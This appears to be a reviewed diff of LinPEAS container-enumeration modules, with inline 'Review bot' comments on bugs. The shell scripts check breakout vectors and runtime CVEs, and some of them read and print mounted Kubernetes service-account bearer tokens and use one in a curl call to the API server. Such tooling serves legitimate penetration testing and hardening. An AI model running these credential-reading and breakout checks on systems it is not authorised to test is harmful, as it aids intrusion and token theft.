print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
if [ "$EXTRA_CHECKS" ]; then
print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
fi
echo ""
print_3title "Namespaces"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces"
ls -l /proc/self/ns/
if echo "$containerType" | grep -qi "kubernetes"; then
print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
echo ""
print_2title "Kubernetes Information"
print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
print_3title "Kubernetes service account folder"
ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
echo ""
print_3title "Kubernetes env vars"
(env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
echo ""
print_3title "Current sa user k8s permissions"
print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles"
kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
"https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
-X 'POST' -H 'Content-Type: application/json' \
--header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
fi
echo ""
print_2title "Container Capabilities"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape"
if [ "$(command -v capsh)" ]; then
capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
else
defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
fi
echo ""
print_2title "Privilege Mode"
if [ -x "$(command -v fdisk)" ]; then
if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
else
echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
fi
else
echo_not_found
fi
echo ""
print_2title "Interesting Files Mounted"
(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
echo ""
print_2title "Possible Entrypoints"
ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
echo ""
fi
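Review bot: `if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then` in the "Am I Containered?" block tests `$$` (the shell's PID) followed by a literal string, so the condition is always true and `execBin` runs even when no amicontained binary was embedded; it should be `[ "$FAT_LINPEAS_AMICONTAINED" ]`. Two reporting mix-ups in the same region: `kcore_readable` is derived from `head -n 1 /tmp/kcore` yet is printed as "/proc/kcore readable", and the "/proc/self/mem readable" line prints `$sched_debug_readable`, while the /proc/self/mem result stored in `mem_readable` is overwritten a few lines later by the /proc/mem probe, so the self-mem result never reaches the output (the new module refers to `$self_mem_readable`, which is the rename this needs). "Run ushare" is a typo for unshare. In the `kubectl auth can-i` fallback, the base64-encoded SelfSubjectRulesReview body is a fixed blob whose `spec.namespace` is a hard-coded value rather than the namespace read from the mounted service-account file, so the permissions it lists are for the wrong namespace; build the JSON from `$(cat .../namespace)` instead.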

View File

@ -0,0 +1,73 @@
# Title: Container - Container Tools
# ID: CT_Container_tools
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Find container related tools in the PATH of the system that could be used for container escape:
# - Container runtime tools
# - Container management tools
# - Container networking tools
# - Common vulnerable scenarios:
# * Misconfigured container tools
# * Privileged container tools
# * Container escape tools
# - Exploitation methods:
# * Tool abuse: Exploit container tool misconfigurations
# * Common attack vectors:
# - Runtime escape
# - Privilege escalation
# - Container breakout
# * Exploit techniques:
# - Tool misconfiguration abuse
# - Privileged tool exploitation
# - Container escape tool usage
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables:
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Container related tools present (if any):"
# Container runtimes
command -v docker
command -v lxc
command -v rkt
command -v podman
command -v runc
command -v ctr
command -v containerd
command -v crio
command -v nerdctl
# Container management
command -v kubectl
command -v crictl
command -v docker-compose
command -v docker-machine
command -v minikube
command -v kind
# Container networking
command -v docker-proxy
command -v cni
command -v flanneld
command -v calicoctl
# Container security
command -v apparmor_parser
command -v seccomp
command -v gvisor
command -v kata-runtime
# Container debugging
command -v nsenter
command -v unshare
command -v chroot
command -v capsh
command -v setcap
command -v getcap
echo ""
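Review bot: three of the `command -v` probes here cannot match a real binary: there is no `seccomp` executable (seccomp is a kernel facility used through libseccomp), gVisor's runtime binary is `runsc`, not `gvisor`, and CNI ships as plugins in a plugin directory rather than as a `cni` command, so `command -v seccomp`, `command -v gvisor` and `command -v cni` are dead checks; replace `gvisor` with `runsc` and drop or rename the other two. Separately, `nsenter`, `unshare`, `chroot`, `capsh`, `setcap` and `getcap` are stock util-linux/coreutils/libcap tools found on most images, so a module whose Description promises tools "that could be used for container escape" will fire almost everywhere; splitting the runtime/orchestrator probes from the generic utilities would make a hit meaningful. The header's "Common vulnerable scenarios / Exploitation methods" block is boilerplate that does not describe what the `command -v` lines do; a one-line Description would document the module better.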

View File

@ -0,0 +1,33 @@
# Title: Container - List mounted tokens
# ID: CT_List_mounted_tokens
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: List tokens mounted in the system if any
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables:
# Initial Functions:
# Generated Global Variables: $ALREADY_TOKENS, $TEMP_TOKEN
# Fat linpeas: 0
# Small linpeas: 1
if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
print_2title "Listing mounted tokens"
print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
ALREADY_TOKENS="IinItialVaaluE"
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
TEMP_TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
if ! [ $(echo $TEMP_TOKEN | grep -E $ALREADY_TOKENS) ]; then
ALREADY_TOKENS="$ALREADY_TOKENS|$TEMP_TOKEN"
echo "Directory: $i"
echo "Namespace: $(cat $i)"
echo ""
echo $TEMP_TOKEN
echo "================================================================================"
echo ""
fi
done
fi
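Review bot: the mount filter `sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'` only matches a tmpfs whose mount path contains both "secret" and "default", i.e. the legacy `default-token-*` secret volumes; projected service-account tokens (mounted from a `kubernetes.io~projected/kube-api-access-*` volume) and the in-container mount point `/run/secrets/kubernetes.io/serviceaccount` contain no "default" and are skipped, so on current clusters the module usually prints nothing. Inside the loop, `if ! [ $(echo $TEMP_TOKEN | grep -E $ALREADY_TOKENS) ]; then` passes the accumulated tokens as an unquoted regular expression and leaves the `[ ... ]` operand unquoted, which breaks on word splitting; quote both and use `grep -F -x` for the de-duplication. The module also echoes the full `$TEMP_TOKEN` into the report, so a shared or pasted report carries a live bearer token; printing the path and the namespace, or only a truncated prefix of the token, keeps the finding without copying the secret.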

View File

@ -0,0 +1,109 @@
# Title: Container - Container details
# ID: CT_Container_details
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Get detailed container information relevant to privilege escalation:
# - Container type and runtime
# - Running containers
# - Container configuration
# - Common vulnerable scenarios:
# * Misconfigured containers
# * Privileged containers
# * Exposed container APIs
# * Container networking
# - Exploitation methods:
# * Container breakout: Exploit container misconfigurations
# * Common attack vectors:
# - Runtime escape
# - Privilege escalation
# - Container breakout
# - Network escape
# * Exploit techniques:
# - Container misconfiguration abuse
# - Privileged container exploitation
# - Container API abuse
# - Network escape techniques
# License: GNU GPL
# Version: 1.0
# Functions Used: containerCheck, echo_no, print_2title, print_list, warn_exec
# Global Variables: $containerType
# Initial Functions: containerCheck
# Generated Global Variables: $dockercontainers, $podmancontainers, $lxccontainers, $rktcontainers, $containerCounts
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Container details"
print_list "Is this a container? ...........$NC $containerType"
# Get container runtime info
if [ "$(command -v docker || echo -n '')" ]; then
print_list "Docker version ...............$NC "
warn_exec docker version
print_list "Docker info .................$NC "
warn_exec docker info
fi
if [ "$(command -v podman || echo -n '')" ]; then
print_list "Podman version ..............$NC "
warn_exec podman version
print_list "Podman info ................$NC "
warn_exec podman info
fi
if [ "$(command -v lxc || echo -n '')" ]; then
print_list "LXC version ................$NC "
warn_exec lxc version
print_list "LXC info ...................$NC "
warn_exec lxc info
fi
print_list "Any running containers? ........ "$NC
# Get counts of running containers for each platform
dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l)
if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
echo_no
else
containerCounts=""
if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
# List any running containers with more details
if [ "$dockercontainers" -ne "0" ]; then
echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"
docker ps -a 2>/dev/null
#echo "Docker Container Details" | sed -${E} "s,.*,${SED_RED},"
#docker inspect $(docker ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g"
echo ""
fi
if [ "$podmancontainers" -ne "0" ]; then
echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"
podman ps -a 2>/dev/null
#echo "Podman Container Details" | sed -${E} "s,.*,${SED_RED},"
#podman inspect $(podman ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g"
echo ""
fi
if [ "$lxccontainers" -ne "0" ]; then
echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"
lxc list 2>/dev/null
#echo "LXC Container Details" | sed -${E} "s,.*,${SED_RED},"
#lxc config show $(lxc list -c n --format csv) 2>/dev/null | grep -E "security.privileged|security.capabilities|security.syscalls" | sed -${E} "s,true|privileged|host,${SED_RED},g"
echo ""
fi
if [ "$rktcontainers" -ne "0" ]; then
echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"
rkt list 2>/dev/null
#echo "RKT Container Details" | sed -${E} "s,.*,${SED_RED},"
#rkt status $(rkt list --format=json 2>/dev/null | jq -r '.[].id') 2>/dev/null | grep -E "privileged|capabilities|security" | sed -${E} "s,true|privileged|host,${SED_RED},g"
echo ""
fi
fi
echo ""
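Review bot: the four commented-out detail blocks (e.g. `#docker inspect $(docker ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" ...`) are dead code in a newly added file; either enable them, since they are the part that would actually surface privileged containers as the header's Description promises, or drop them and reword the Description. `warn_exec docker info` and `warn_exec podman info` dump the whole daemon configuration whenever the client binary exists, which is verbose even when the user cannot reach the socket; gating them on the socket being accessible (or on `$EXTRA_CHECKS`) would keep the default report short. Minor: the dot padding in "Docker version ...............", "Podman info ................" and "LXC info ..................." is uneven, so these labels do not line up with "Any running containers? ........ ".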

View File

@ -0,0 +1,37 @@
# Title: Container - Docker Container details
# ID: CT_Docker_container_details
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Get docker Container details from the inside
# License: GNU GPL
# Version: 1.0
# Functions Used: checkDockerRootless, checkDockerVersionExploits, containerCheck, enumerateDockerSockets, inDockerGroup, print_2title, print_list
# Global Variables: $containerType, $DOCKER_GROUP, $DOCKER_ROOTLESS, $dockerVersion, $inContainer, $VULN_CVE_2019_5736, $VULN_CVE_2019_13139, $VULN_CVE_2021_41091
# Initial Functions: containerCheck
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
#If docker
if echo "$containerType" | grep -qi "docker"; then
print_2title "Docker Container details"
inDockerGroup
print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
enumerateDockerSockets
print_list "Docker version .................$NC$dockerVersion"
checkDockerVersionExploits
print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Vulnerable to CVE-2021-41091 ...$NC$VULN_CVE_2021_41091"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
if [ "$inContainer" ]; then
checkDockerRootless
print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
echo ""
fi
if df -h | grep docker; then
print_2title "Docker Overlays"
df -h | grep docker
fi
fi
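Review bot: `if df -h | grep docker; then` prints the matching lines as a side effect of the test, and the body then runs `df -h | grep docker` again under the "Docker Overlays" title, so every overlay mount appears twice; use `grep -q` in the condition. The new `Vulnerable to CVE-2021-41091` line prints `$VULN_CVE_2021_41091`, which the header declares as a Global Variable but which only carries a value if `checkDockerVersionExploits` sets it; please confirm it does, otherwise the line shows an empty result instead of "No" like the two lines above it. Also "Docker version .................$NC$dockerVersion" lacks the space before the value that the other labels have.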

View File

@ -0,0 +1,293 @@
# Title: Container - Container & breakout enumeration
# ID: CT_Container_breakout
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Container breakout enumeration to identify potential escape vectors:
# - Container runtime vulnerabilities
# - Mount point misconfigurations
# - Capability abuse
# - Namespace escape
# - Common vulnerable scenarios:
# * Privileged containers
# * Misconfigured mounts
# * Excessive capabilities
# * Namespace isolation bypass
# * Runtime vulnerabilities
# * Container escape tools
# * Shared kernel exploits
# * Container escape CVEs
# - Exploitation methods:
# * Mount escape: Abuse mount misconfigurations
# * Capability abuse: Exploit excessive capabilities
# * Namespace escape: Break out of container namespaces
# * Runtime escape: Exploit container runtime vulnerabilities
# * Common attack vectors:
# - Mount point manipulation
# - Capability exploitation
# - Namespace breakout
# - Runtime vulnerability abuse
# - Kernel exploit abuse
# - Container escape tool usage
# * Exploit techniques:
# - Mount point abuse
# - Capability escalation
# - Namespace escape
# - Runtime exploitation
# - Kernel exploitation
# - Container escape tool execution
# License: GNU GPL
# Version: 1.0
# Functions Used: checkContainerExploits, checkProcSysBreakouts, containerCheck, print_2title, print_3title, print_info, print_list, warn_exec
# Global Variables: $binfmt_misc_breakout, $containercapsB, $containerType, $core_pattern_breakout, $dev_mounted, $efi_efivars_writable, $efi_vars_writable, $GREP_IGNORE_MOUNTS, $inContainer, $kallsyms_readable, $kcore_readable, $kmem_readable, $kmem_writable, $kmsg_readable, $mem_readable, $mem_writable, $modprobe_present, $mountinfo_readable, $panic_on_oom_dos, $panic_sys_fs_dos, $proc_configgz_readable, $proc_mounted, $run_unshare, $release_agent_breakout1, $release_agent_breakout2, $release_agent_breakout3, $sched_debug_readable, $security_present, $security_writable, $sysreq_trigger_dos, $uevent_helper_breakout, $vmcoreinfo_readable, $VULN_CVE_2019_5021, $self_mem_readable
# Initial Functions: containerCheck
# Generated Global Variables: $defautl_docker_caps, $containerd_version, $runc_version, $containerd_version
# Fat linpeas: 0
# Small linpeas: 0
if [ "$inContainer" ]; then
echo ""
print_2title "Container & breakout enumeration"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html"
# Basic container info
print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
fi
# Security mechanisms
print_3title "Security Mechanisms"
print_list "Seccomp enabled? ............... "$NC
([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
print_list "AppArmor profile? .............. "$NC
(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
print_list "User proc namespace? ........... "$NC
if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
# Known vulnerabilities
print_3title "Known Vulnerabilities"
checkContainerExploits
print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
# Check for container escape tools
print_list "Container escape tools present .. "$NC
(command -v nsenter || command -v unshare || command -v chroot || command -v capsh || command -v setcap || command -v getcap || command -v docker || command -v kubectl || command -v ctr || command -v runc || command -v containerd || command -v crio || command -v podman || command -v lxc || command -v rkt || command -v nerdctl || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap|docker|kubectl|ctr|runc|containerd|crio|podman|lxc|rkt|nerdctl,${SED_RED},g"
# Runtime vulnerabilities
print_3title "Runtime Vulnerabilities"
# Check for known runtime vulnerabilities
if [ "$(command -v runc || echo -n '')" ]; then
print_list "Runc version ................. "$NC
warn_exec runc --version
# Check for specific runc vulnerabilities
runc_version=$(runc --version 2>/dev/null | grep -i "version" | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
if [ "$runc_version" ]; then
print_list "Runc CVE-2019-5736 ........... "$NC
if [ "$(echo $runc_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 0) || ($1 == 1 && $2 == 0 && $3 < 7)) print "Yes"; else print "No"; }')" = "Yes" ]; then
echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
else
echo "No"
fi
fi
fi
if [ "$(command -v containerd || echo -n '')" ]; then
print_list "Containerd version ........... "$NC
warn_exec containerd --version
# Check for specific containerd vulnerabilities
containerd_version=$(containerd --version 2>/dev/null | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
if [ "$containerd_version" ]; then
print_list "Containerd CVE-2020-15257 ..... "$NC
if [ "$(echo $containerd_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 4) || ($1 == 1 && $2 == 4 && $3 < 3)) print "Yes"; else print "No"; }')" = "Yes" ]; then
echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
else
echo "No"
fi
fi
fi
# Mount escape vectors
print_3title "Breakout via mounts"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html"
checkProcSysBreakouts
print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Run unshare .................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "release_agent breakout 3........ $release_agent_breakout3\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
# Additional mount checks
print_list "Docker socket mounted? ......... "$NC
(mount | grep -E "docker.sock|/var/run/docker.sock" || echo "No") | sed -${E} "s,Yes|docker.sock,${SED_RED},"
print_list "Common host filesystem mounted? "$NC
(mount | grep -E "host|/host|/mnt/host" || echo "No") | sed -${E} "s,Yes|host,${SED_RED},"
print_list "Interesting mounts ............. "$NC
mount | grep -E "docker|container|overlay|kubelet" | grep -v "proc" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
# Check for writable mount points
print_list "Writable mount points ......... "$NC
mount | grep -E "rw," | grep -v "ro," | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
# Check for shared mount points
print_list "Shared mount points ........... "$NC
mount | grep -E "shared|slave" | sed -${E} "s,docker.sock|host|privileged,${SED_RED},g"
# Capability checks
print_3title "Capability Checks"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/capabilities-abuse-escape.html"
print_list "Dangerous capabilities ......... "$NC
if [ "$(command -v capsh || echo -n '')" ]; then
capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
else
defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
fi
# Additional capability checks
print_list "Dangerous syscalls allowed ... "$NC
if [ -f "/proc/sys/kernel/yama/ptrace_scope" ]; then
(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "Not found") | sed -${E} "s,0,${SED_RED},"
else
echo "Not found"
fi
# Namespace checks
print_3title "Namespace Checks"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/namespaces/index.html"
print_list "Current namespaces ............. "$NC
ls -l /proc/self/ns/
print_list "Host network namespace? ........ "$NC
if [ "$(ip netns list 2>/dev/null)" ]; then
echo "Yes - Host network namespace accessible" | sed -${E} "s,Yes,${SED_RED},"
else
echo "No"
fi
# Additional namespace checks
print_list "Host IPC namespace? ........... "$NC
if [ "$(ls -l /proc/self/ns/ipc 2>/dev/null)" = "$(ls -l /proc/1/ns/ipc 2>/dev/null)" ]; then
echo "Yes - Host IPC namespace shared" | sed -${E} "s,Yes,${SED_RED},"
else
echo "No"
fi
print_list "Host PID namespace? ........... "$NC
if [ "$(ls -l /proc/self/ns/pid 2>/dev/null)" = "$(ls -l /proc/1/ns/pid 2>/dev/null)" ]; then
echo "Yes - Host PID namespace shared" | sed -${E} "s,Yes,${SED_RED},"
else
echo "No"
fi
print_list "Host UTS namespace? ........... "$NC
if [ "$(ls -l /proc/self/ns/uts 2>/dev/null)" = "$(ls -l /proc/1/ns/uts 2>/dev/null)" ]; then
echo "Yes - Host UTS namespace shared" | sed -${E} "s,Yes,${SED_RED},"
else
echo "No"
fi
# Additional breakout vectors
print_3title "Additional Breakout Vectors"
print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
# Check for container escape tools in PATH
print_list "Container escape tools in PATH . "$NC
(which nsenter 2>/dev/null || which unshare 2>/dev/null || which chroot 2>/dev/null || which capsh 2>/dev/null || which setcap 2>/dev/null || which getcap 2>/dev/null || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap,${SED_RED},g"
print_3title "Extra Breakout Vectors"
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/self/mem readable ........ $self_mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
# Additional kernel checks
print_list "Kernel version .............. "$NC
uname -a | sed -${E} "s,$(uname -r),${SED_RED},"
print_list "Kernel modules ............. "$NC
